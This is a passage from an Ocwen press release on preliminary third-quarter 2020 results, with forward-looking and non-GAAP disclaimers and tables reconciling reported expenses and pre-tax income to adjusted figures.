and other statuses with them; our ability to fund future draws on existing loans in our reverse mortgage portfolio; our servicer and credit ratings as well as other actions from various rating agencies, including any future downgrades; as well as other risks and uncertainties detailed in Ocwen’s reports and filings with the SEC, including its annual report on Form 10-K for the year ended December 31, 2019 and its current and quarterly reports since such date. Anyone wishing to understand Ocwen’s business should review its SEC filings. Our forward-looking statements speak only as of the date they are made and, we disclaim any obligation to update or revise forward-looking statements whether as a result of new information, future events or otherwise.

Note Regarding Non-GAAP Financial Measures

This press release contains references to non-GAAP financial measures, such as our references to adjusted pre-tax income (loss) and adjusted pre-tax income (loss) excluding amortization of NRZ lump-sum payments.

We believe these non-GAAP financial measures provide a useful supplement to discussions and analysis of our financial condition. In addition, management believes that these presentations may assist investors with understanding and evaluating our cost re-engineering efforts and other initiatives to drive improved financial performance. However, these measures should not be analyzed in isolation or as a substitute for analysis of our GAAP expenses and pre-tax income (loss). There are certain limitations to the analytical usefulness of the adjustments we make to GAAP expenses and pre-tax income (loss) and, accordingly, we rely primarily on our GAAP results and use these adjustments only for purposes of supplemental analysis. Non-GAAP financial measures should be viewed in addition to, and not as an alternative for, Ocwen’s reported results under accounting principles generally accepted in the United States. Other companies may use non-GAAP financial measures with the same or similar titles that are calculated differently to our non-GAAP financial measures. As a result, comparability may be limited. Readers are cautioned not to place undue reliance on analysis of the adjustments we make to GAAP expenses and pre-tax income (loss).

Beginning with the three months ended June 30, 2020, we refined our definitions of Expense Notables, which we previously referred to as “Expenses Excluding MSR Valuation Adjustments, net, and Expense Notables,” and Income Statement Notables in order to be more descriptive of the types of items included.

Expense Notables

In the table titled “Expense Notables”, we adjust GAAP operating expenses for the following factors (1) expenses related to severance, retention and other actions associated with continuous cost and productivity improvement efforts, (2) significant legal and regulatory settlement expense itemsa, (3) NRZ consent process expenses related to the transfer of legal title in MSRs to NRZ, (4) PHH acquisition and integration planning expenses, and (5) certain other significant activities including, but not limited to, insurance related expense and settlement recoveries, compensation or incentive compensation expense reversals and non-routine transactions (collectively, Other) consistent with the intent of providing management and investors with a supplemental means of evaluating our expenses.

($ in millions) Q2’18 Q3’19 Q3’20(c)
OCN PHH OCN + PHH OCN + PHH (Annualized) OCN OCN (Annualized) OCN OCN (Annualized)
I Expenses (as reported) (a) 206 71 277 1,107 45 179
II Reclassifications (b) 1 1 5
III Deduction of MSR valuation adjustments, net (33 ) (33 ) (132 ) 135 538
IV Operating Expenses (I+II+III) 173 72 245 979 179 717 150 598
Adjustments for Notables
Re-engineering costs (5 ) (3 ) (8 ) (32 ) (18 ) (7 )
Significant legal and regulatory settlement expenses (7 ) (3 ) (11 ) (42 ) (4 ) (6 )
NRZ consent process expenses (1 ) (1 ) (2 ) (0 ) 0
PHH acquisition and integration planning expenses (2 ) (2 ) (8 )
Expense recoveries 6 6 23 2
COVID-19 Related Expenses (6 )
Other 1 (1 ) (1 ) 3 (0 )
V Expense Notables (9 ) (7 ) (16 ) (63 ) (17 ) (19 )
VI Adjusted Expenses (IV+V) 164 65 229 916 162 648 130 522

(a) Q2’18 expenses as per OCN Form 10-Q of $206 filed on July 26, 2018 and PHH Form 10-Q of $71 filed August 3, 2018, annualized to equal $1,107 on a combined basis

(b) Reclassifications made to PHH reported expenses to conform to Ocwen presentation

(c) OCN changed the presentation of expenses in Q4’19 to separately report MSR valuation adjustments, net, from operating expenses

Income Statement Notables

In the table titled “Income Statement Notables”, we adjust GAAP pre-tax loss for the following factors (1) Expense Notables, (2) changes in fair value of our Agency and Non-Agency MSRs due to changes in interest rates, valuation inputs and other assumptions, net of hedge positions, (3) offsets to changes in fair value of our MSRs in our NRZ financing liability due to changes in interest rates, valuation inputs and other assumptions, (4) changes in fair value of our reverse originations portfolio due to changes in interest rates, valuation inputs and other assumptions, (5) certain other transactions, including but not limited to pension benefit cost adjustments and gains related to exercising servicer call rights and fair value assumption changes on other investments (collectively, Other) and (6) amortization of NRZ lump-sum cash payments consistent with the intent of providing management and investors with a supplemental means of evaluating our net income/(loss).

($ in millions) Q2’18 Q3’19 Q3’20
OCN PHH OCN + PHH OCN + PHH (Annualized) OCN OCN (Annualized) OCN OCN (Annualized)
I Reported Pre-Tax Income / (Loss)(a) (28 ) (35 ) (63 ) (253 ) (38 ) (153 ) (11 ) (25 )
Adjustment for Notables
Expense Notables (from prior table) 9 7 16 17 19
Non-Agency MSR FV Change(b) (5 ) (5 ) (252 ) (14 )
Agency MSR FV Change, net of macro hedge(b) 63 4
NRZ MSR Liability FV Change (Interest Expense) 9 9 198 10
Reverse FV Change 4 4 (3 ) 4
Debt Repurchase Gain (5 )
Other (6 ) (6 ) 2 1
II Total Income Statement Notables 11 7 18 72 21 83 25
III Adjusted Pre-tax Income (Loss) (I+II) (17 ) (28 ) (45 ) (181 ) (18 ) (70 ) 14 54
IV Amortization of NRZ Lump-sum Cash Payments (35 ) (35 ) (141 ) (42 ) (98 )
V Adjusted Pre-tax Income (Loss) excluding Amortization of NRZ Lump-sum (III+IV)(c) (53 ) (28 ) (81 ) (322 ) (42 ) (168 ) 14 54

(a) Q2’18 pre-tax loss as per respective Forms 10-Q filed on July 26, 2018 and August 3, 2018, respectively, annualized to equal $(253) million on a combined basis

(b) Represents FV changes that are driven by changes in interest rates, valuation inputs or other assumptions, net of unrealized gains / (losses) on macro hedge. Non-Agency = Total MSR excluding GNMA & GSE MSRs. Agency = GNMA & GSE MSRs. The adjustment does not include $12 million valuation gains of certain MSRs that were opportunistically purchased in disorderly transactions due to the market environment in Q2 2020 (nil in Q2 2018).

(c) Represents OCN and PHH combined adjusted pre-tax income (loss) excluding amortization of NRZ lump-sum cash payments, annualized to equal $(322) million on a combined basis in Q2’18

Note Regarding Financial Performance Estimates

This press release contains statements relating to our preliminary third quarter financial performance and our current assessments of the impact of the COVID-19 pandemic. These statements are based on currently available information and reflect our current estimates and assessments, including about matters that are beyond our control. We are operating in a fluid and evolving environment and actual outcomes may differ materially from our current estimates and assessments. The Company has not finished its third quarter financial closing procedures. There can be no assurance that actual results will not differ from our current estimates and assessments, including as a result of third quarter financial closing procedures, and any such differences could be material.

FOR FURTHER INFORMATION CONTACT:


a Including but not limited to CFPB, Florida Attorney General/Florida Office of Financial Regulation and Massachusetts Attorney General litigation related legal expenses, state regulatory action related legal expenses and state regulatory action settlement related escrow analysis costs (collectively, CFPB and state regulatory defense and escrow analysis expenses)
